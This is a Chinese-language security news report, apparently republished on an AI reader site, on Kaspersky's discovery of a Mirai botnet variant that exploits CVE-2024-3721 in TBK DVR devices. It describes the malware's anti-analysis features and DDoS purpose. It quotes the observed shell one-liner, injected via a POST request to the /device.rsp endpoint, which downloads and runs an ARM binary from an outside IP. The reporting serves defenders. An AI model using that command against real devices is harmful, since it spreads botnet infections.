安全客 06月09日 17:20
新的 Mirai 僵尸网络变种通过 CVE-2024-3721 瞄准 DVR 系统
index_new5.html
../../../zaker_core/zaker_tpl_static/wap/tpl_guoji1.html

 

卡巴斯基研究人员发现,Mirai僵尸网络的新变种正在利用CVE-2024-3721漏洞攻击DVR监视系统。攻击者通过向易受攻击的DVR端点发送POST请求,嵌入Linux shell命令,下载并执行ARM32二进制文件。新变种增加了RC4加密、防虚拟化检查和进程检查等功能,以增加分析难度。该恶意软件主要用于DDoS攻击,受感染系统重启后感染会被清除,但由于不断扫描互联网,再感染风险依然存在。根据卡巴斯基的遥测数据,超过50,000个DVR设备暴露在外。

📡 攻击始于针对易受攻击的DVR端点的POST请求,其中嵌入了伪装在有效载荷中的Linux shell命令,用于下载并执行ARM32二进制文件。

🛡️ 该僵尸网络变种采用了多种技术来混淆和隐藏恶意行为,包括使用RC4加密字符串、防虚拟化检查、进程检查和执行目录验证,以增加分析难度。

🌍 大部分受感染系统位于中国、越南和印度等国家,表明攻击者可能针对特定地区。通过公开扫描识别了超过50,000个公开暴露的DVR设备,表明潜在的增长载体非常重要。

💣 恶意软件的主要目的是进行DDoS攻击,一旦部署,它会连接到C2服务器并等待指令。虽然感染在重启后会被清除,但由于持续扫描,再感染的风险依然存在。

卡巴斯基研究人员发现了利用CVE-2024-3721部署臭名昭着的Mirai僵尸网络的改进版本的新一波攻击 – 这一次,目标是基于DVR的易受攻击的监视系统。

攻击以发送到易受攻击的TBK DVR端点(/device.rsp)的POST请求开始,嵌入了伪装在有效载荷中的Linux shell命令:

cd /tmp; rm arm7; wget http://42.112.26[.]36/arm7; chmod 777 *; ./arm7 tbk

这个单行下载并执行一个ARM32二进制文件——不需要架构探测。攻击针对速度,效率和目标设备进行了优化,以确保这种架构。

“通常情况下,机器人感染涉及最初调查目标机器的shell脚本……然而,在这种情况下……侦察阶段是不必要的,”卡巴斯基解释说。

虽然这个机器人是基于近十年前发布的Mirai源代码,但它包括几个现代曲折:

  • 使用 XOR 混淆键的 RC4 加密字符串
  • VMware 和 QEMU 的防虚拟化检查
  • 通过 /proc/[pid]/cmdline 进行过程检查
  • 执行目录验证

 

这些新增功能旨在使分析更加困难,并最大限度地减少沙盒环境中的检测。

“这个变体中的数据解密例程作为简单的RC4算法实现……解密的RC4密钥用于解密字符串,”研究人员说。

 

根据卡巴斯基的遥测数据,大多数受感染的系统位于:

 

通过公开扫描识别了超过50,000个公开暴露的DVR设备,僵尸网络的潜在增长载体非常重要。

部署后,恶意软件将连接到命令和控制(C2)服务器并等待指令 – 最有可能用于分布式拒绝服务(DDoS)攻击或其他大规模利用活动。

“这种机器人的主要目标是进行压倒网站和服务(DDoS攻击)的攻击,”卡巴斯基警告说。

有趣的是,恶意软件在许多设备上无法实现长期持久性。如果重新启动,感染就会被消除 – 但随着机器人不断扫描互联网,再感染永远不会遥远。

Fish AI Reader

Fish AI Reader

AI辅助创作,多种专业模板,深度分析,高质量内容生成。从观点提取到深度思考,FishAI为您提供全方位的创作支持。新版本引入自定义参数,让您的创作更加个性化和精准。

FishAI

FishAI

鱼阅,AI 时代的下一个智能信息助手,助你摆脱信息焦虑

联系邮箱 441953276@qq.com

相关标签

Mirai 僵尸网络 DVR DDoS攻击 CVE-2024-3721
相关文章